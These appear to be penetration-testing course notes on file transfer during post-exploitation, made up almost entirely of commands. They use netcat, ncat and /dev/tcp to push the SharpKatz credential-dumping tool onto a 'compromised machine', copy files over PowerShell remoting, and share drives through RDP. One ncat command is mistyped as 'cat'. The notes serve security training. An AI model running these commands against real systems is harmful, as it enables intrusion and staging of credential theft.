Miscellaneous File Transfer Methods

Netcat

NetCat - Compromised Machine - Listening on Port 8000 

nc -l -p 8000 > SharpKatz.exe

Netcat - Attack Host - Sending File to Compromised machine 

wget -q https://github.com/Flangvik/SharpCollection/raw/master/NetFramework_4.7_x64/SharpKatz.exe
nc -q 0 192.168.49.128 8000 < SharpKatz.exe

Attack Host - Sending File as Input to Netcat 

sudo nc -l -p 443 -q 0 < SharpKatz.exe

Compromised Machine Connect to Netcat to Receive the File 

nc 192.168.49.128 443 > SharpKatz.exe

NetCat - Sending File as Input to Netcat 

sudo nc -l -p 443 -q 0 < SharpKatz.exe

Compromised Machine Connecting to Netcat Using /dev/tcp to Receive the File 

cat < /dev/tcp/192.168.49.128/443 > SharpKatz.exe

Ncat

Ncat - Compromised Machine - Listening on Port 8000 

ncat -l -p 8000 --recv-only > SharpKatz.exe

Ncat - Attack Host - Sending File to Compromised machine 

wget -q https://github.com/Flangvik/SharpCollection/raw/master/NetFramework_4.7_x64/SharpKatz.exe
ncat --send-only 192.168.49.128 8000 < SharpKatz.exe

Attack Host - Sending File as Input to Ncat 

sudo ncat -l -p 443 --send-only < SharpKatz.exe

Compromised Machine Connect to Ncat to Receive the File 

 cat 192.168.49.128 443 --recv-only > SharpKatz.exe

Ncat - Sending File as Input to Ncat 

sudo ncat -l -p 443 --send-only < SharpKatz.exe

PowerShell Session File Transfer

From DC01 - Confirm WinRM port TCP 5985 is Open on DATABASE01. 

PS C:\sam> whoami

sam\administrator

PS C:\sam> hostname

DC01

PS C:\sam> Test-NetConnection -ComputerName DATABASE01 -Port 5985

ComputerName     : DATABASE01
RemoteAddress    : 192.168.1.101
RemotePort       : 5985
InterfaceAlias   : Ethernet0
SourceAddress    : 192.168.1.100
TcpTestSucceeded : True

Create a PowerShell Remoting Session to DATABASE01 

PS C:\sam> $Session = New-PSSession -ComputerName DATABASE01

Copy samplefile.txt from our Localhost to the DATABASE01 Session 

PS C:\sam> Copy-Item -Path C:\samplefile.txt -ToSession $Session -Destination C:\Users\Administrator\Desktop\

Copy DATABASE.txt from DATABASE01 Session to our Localhost 

PS C:\sam> Copy-Item -Path "C:\Users\Administrator\Desktop\DATABASE.txt" -Destination C:\ -FromSession $Session

RDP

Mounting a Linux Folder Using rdesktop 

rdesktop <ip> -d <domain> -u <user> -p '<pass>' -r disk:linux='<Folder>'

Mounting a Linux Folder Using xfreerdp 

xfreerdp /v:<ip> /d:<domain> /u:<user> /p:'<pass>' /drive:linux,<folder>

Note

To access the directory, we can connect to \\tsclient\, allowing us to transfer files to and from the RDP session.